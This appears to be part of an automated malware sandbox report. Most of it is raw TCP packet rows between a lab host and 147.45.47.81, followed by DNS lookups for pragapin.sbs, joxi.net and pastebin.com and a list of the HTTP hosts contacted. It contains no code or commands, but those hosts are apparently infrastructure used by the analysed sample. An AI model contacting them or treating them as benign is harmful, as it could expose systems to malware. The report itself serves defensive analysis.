                                                                                                                                                                                Nov 10, 2024 09:18:42.004043102 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.004070044 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.004789114 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.004832029 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.004854918 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.004868031 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.004904032 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.005026102 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.005038977 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.005050898 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.005094051 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.005518913 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.005531073 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.005547047 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.005568027 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.005595922 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.009161949 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.009174109 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.009191036 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.009219885 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.051915884 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.051930904 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.051958084 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.051970959 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.051975012 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.052005053 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.093436956 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.093468904 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.093482971 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.093494892 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.093528032 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.093575954 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.121949911 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.121965885 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.121980906 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.121995926 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.122015953 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.122570038 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.122631073 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.122669935 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.122714996 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.122726917 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.122741938 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.122752905 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.122762918 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.122785091 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.123359919 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.123372078 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.123383999 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.123414040 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.126914024 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.126935005 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.126946926 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.126959085 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.126981020 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.169110060 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.169123888 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.169137001 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.169214010 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.210551977 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.210565090 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.210577011 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.210592985 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.210621119 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.238882065 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.238935947 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.238950968 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.238972902 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.239003897 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.239042044 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.239739895 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.239749908 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.239788055 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.239810944 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.239840031 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.239859104 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.239876032 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.239881039 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.239914894 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.240447998 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.240504026 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.240515947 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.240545988 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.240865946 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.240912914 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.240916014 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.243983030 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.244023085 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.244024038 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.244093895 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.244105101 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.244131088 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.286113024 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.286125898 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.286144972 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.286154985 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.286164999 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.286195040 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.327634096 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.327649117 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.327680111 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.327754021 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.327764988 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.327794075 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.356030941 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.356045961 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.356055975 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.356102943 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.356959105 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.356971025 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.356982946 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.356997013 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.357008934 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.357029915 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.357043982 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.357043982 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.357320070 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.357331991 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.357342958 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.357368946 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.361174107 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.361186981 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.361198902 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.361222029 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.361251116 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.403235912 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.403250933 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.403263092 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.403317928 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.444535017 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.444581032 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.444591999 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.444603920 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.444644928 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.444726944 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.444756031 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.444766998 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.444816113 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.473311901 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.473328114 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.473345041 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.473357916 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.473377943 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.474020958 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.474107981 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.474118948 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.474129915 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.474143028 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.474149942 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.474155903 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.474164009 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.474198103 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.474562883 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.474582911 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.474600077 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.474642992 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.478259087 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.478271961 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.478286982 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.478303909 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.478349924 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.520519018 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.520533085 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.520545959 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.520562887 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.520580053 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.520606995 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.561652899 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.561674118 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.561692953 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.561738014 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.561849117 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.561862946 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.561873913 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.561892033 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.561906099 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.590380907 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.590396881 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.590409040 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.590451002 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.591218948 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.591232061 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.591243029 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.591275930 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.591284990 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.591293097 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.591299057 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.591334105 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.591480970 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.591553926 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.591594934 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.591645956 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.591658115 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.591692924 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.595613003 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.595643997 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.595652103 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.595664978 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.595679045 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.595688105 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.595709085 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.636356115 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.637854099 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.637870073 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.637882948 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.637917042 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.678730011 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.678770065 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.678805113 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.678822994 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.678838015 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.678868055 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.679012060 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.679023981 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.679037094 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.679058075 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.679092884 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.707504034 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.707515955 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.707528114 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.707540989 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.707551956 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.707582951 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.708339930 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.708355904 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.708369017 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.708396912 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.708432913 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.708477974 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.708478928 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.708492994 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.708532095 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.708789110 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.708802938 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.708813906 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.708842039 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.712804079 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.712817907 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.712840080 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.712852955 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.712860107 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.712886095 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.713011980 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.713032007 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.713047981 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.754842997 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.754880905 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.754884958 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.754920959 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.754959106 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.754977942 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.754991055 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.755026102 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.795948029 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.795965910 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.795984983 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.796010971 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.796076059 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.796087980 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.796098948 CET8049933147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:42.796122074 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.796152115 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.796603918 CET4993380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:42.796741009 CET4993480192.168.2.9147.45.47.81

                                                                                                                                                                                UDP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Nov 10, 2024 09:18:08.096077919 CET5894053192.168.2.91.1.1.1
                                                                                                                                                                                Nov 10, 2024 09:18:08.141633034 CET53589401.1.1.1192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:35.615958929 CET4980953192.168.2.91.1.1.1
                                                                                                                                                                                Nov 10, 2024 09:18:35.626497984 CET53498091.1.1.1192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:39.121234894 CET5320053192.168.2.91.1.1.1
                                                                                                                                                                                Nov 10, 2024 09:18:39.128496885 CET53532001.1.1.1192.168.2.9

                                                                                                                                                                                DNS Queries

                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                Nov 10, 2024 09:18:08.096077919 CET192.168.2.91.1.1.10x3d2dStandard query (0)pragapin.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 10, 2024 09:18:35.615958929 CET192.168.2.91.1.1.10xccc5Standard query (0)joxi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 10, 2024 09:18:39.121234894 CET192.168.2.91.1.1.10x7937Standard query (0)pastebin.comA (IP address)IN (0x0001)false

                                                                                                                                                                                DNS Answers

                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                Nov 10, 2024 09:18:08.141633034 CET1.1.1.1192.168.2.90x3d2dNo error (0)pragapin.sbs104.21.39.3A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 10, 2024 09:18:08.141633034 CET1.1.1.1192.168.2.90x3d2dNo error (0)pragapin.sbs172.67.141.179A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 10, 2024 09:18:35.626497984 CET1.1.1.1192.168.2.90xccc5No error (0)joxi.net78.47.21.153A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 10, 2024 09:18:35.626497984 CET1.1.1.1192.168.2.90xccc5No error (0)joxi.net176.9.162.205A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 10, 2024 09:18:39.128496885 CET1.1.1.1192.168.2.90x7937No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 10, 2024 09:18:39.128496885 CET1.1.1.1192.168.2.90x7937No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                                                                                                                Nov 10, 2024 09:18:39.128496885 CET1.1.1.1192.168.2.90x7937No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false

                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                • pragapin.sbs
                                                                                                                                                                                • pastebin.com
                                                                                                                                                                                • 147.45.47.81
                                                                                                                                                                                • joxi.net

                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
